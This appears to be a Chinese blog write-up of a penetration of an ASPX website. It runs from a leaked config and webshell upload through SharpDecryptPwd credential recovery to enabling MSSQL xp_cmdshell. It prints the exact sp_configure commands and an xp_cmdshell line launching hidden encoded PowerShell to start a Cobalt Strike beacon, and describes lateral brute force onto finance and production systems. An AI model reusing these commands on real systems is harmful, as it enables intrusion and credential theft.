记一次aspx网站渗透

  • A+
所属分类:安全文章

记一次aspx网站渗透

通过前期信息搜集获取到目标站的80xx端口


记一次aspx网站渗透


发现一处源码泄露
查看配置文件


记一次aspx网站渗透


登录manage.aspx


记一次aspx网站渗透


上传shell
发现安装了TeamViewer


记一次aspx网站渗透

看下进程如果运行tv的话,可直接读取其远程的账号密码
https://github.com/uknowsec/SharpDecryptPwd
SharpDecryptPwd

对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品(Xshell,Xftp)。

本地演示如下


记一次aspx网站渗透


翻找文件,jar包反编译,获取到数据库账号密码和redis密码


记一次aspx网站渗透


由于shell不是system权限,且存在多个杀软。

利用免杀frp代理,利用数据库提权

xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。

开启xp_cmdshell

execsp_configure 'show advanced options', 1;reconfigure;

execsp_configure 'xp_cmdshell',1;reconfigure;


记一次aspx网站渗透


添加用户并添加到管理员组


记一次aspx网站渗透


由于装了天q,新添加的用户无法登录。

那么利用数据库执行命令,上线cs

cmdshell执行时需要编码一下


记一次aspx网站渗透


EXEC master.dbo.xp_cmdshell 'powershell.exe -nop -w hidden -enc xxxxxxxxxxxxxxxxxxxxxxx'

上线cs,抓取密码


记一次aspx网站渗透


利用获取的密码进行横向爆破


记一次aspx网站渗透


发现多台服务器桌面存在密码本和连接生产系统的Anydesk


记一次aspx网站渗透


财务系统

记一次aspx网站渗透


内网没有域,就搞搞数据库和系统了。


记一次aspx网站渗透


记一次aspx网站渗透

本文始发于微信公众号(疯猫网络):记一次aspx网站渗透

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: